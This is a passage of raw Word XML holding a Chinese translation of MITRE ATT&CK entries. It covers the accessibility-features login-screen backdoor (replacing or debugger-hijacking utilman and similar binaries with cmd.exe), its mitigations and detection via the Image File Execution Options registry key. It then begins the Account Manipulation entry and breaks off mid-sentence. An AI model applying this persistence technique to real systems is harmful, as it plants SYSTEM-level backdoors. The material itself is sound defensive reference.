      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”（或其他提供后门访问的程序）。随后，如果你使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>键盘或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已通过远程桌面协议连接，在登录屏幕上按相应的组合键将导致以系统权限执行替换文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE3E37E" w14:textId="27B99992" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Vista</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和更高版本以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Server 2008</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和更高版本的调试器方法。可以修改注册表项，配置“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”或其他提供后门访问的程序作为</w:t>
      </w:r>
      <w:r w:rsidR="00BE6ED6">
        <w:t>辅助功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序（比如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utilman.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的“调试器”。修改注册表后，如果你使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>键盘或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在登录屏幕上按相应的组合键将导致以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统权限执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“调试器”程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639B04D4" w14:textId="78870567" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他</w:t>
      </w:r>
      <w:r w:rsidR="00BE6ED6">
        <w:t>辅助功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以以类似的方式利用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1531BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>On-Screen Keyboard: </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\osk.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412177F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Magnifier: </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\Magnify.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0374C7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Narrator: </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\Narrator.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3C56A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Display Switcher: </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\DisplaySwitch.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D96C85" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>App Switcher: </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\AtBroker.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424EB48" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00771025" w14:paraId="7C258D0F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3762EF24" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="697D0494" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="30B29CBE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47A17CD9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId38" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>执行预防</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193F692D" w14:textId="27802AD6" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可能会使用备用二进制文件替换</w:t>
            </w:r>
            <w:r w:rsidR="00BE6ED6">
              <w:t>辅助功能</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制文件来执行此技术。使用应用白名单工具（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Defender </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Application Control</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或软件限制策略）来识别并阻止通过</w:t>
            </w:r>
            <w:r w:rsidR="00BE6ED6">
              <w:t>辅助功能</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行的潜在恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="07F4C5BE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F34041B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>资源访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="198E6CE8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果可能，请使用远程桌面网关来管理网络中</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的连接和安全配置。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="02D57F0F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5452CC1C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId39" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="076D2FF5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>要远程使用此技术，攻击者必须将其与</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结合使用。确保已启用网络级身份认证，以便在创建会话并显示登录屏幕之前强制远程桌面会话进行身份认证。在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows Vista</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>及更高版本上默认启用此</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="537806A4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA39128" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24047244" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改可用性实用程序二进制文件或修改与已知软件、补丁周期等不相关的二进制路径是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A06029" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令行调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>能够修改注册表以获取相关密钥的工具也是可疑的。应监控实用程序参数和二进制文件本身的修改。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中的注册表项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7895ED57" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>账号操纵</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="69F271A3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ABF2AC0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1098</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D7E33E" w14:textId="1AD9C57B" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F356CAF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F974108" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A69703" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志，网络抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09FC3665" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tim MalcomVetter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BBF6E2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14FE6A63" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F440837" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通过操纵</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号在环境中维持对凭据的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>访问以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
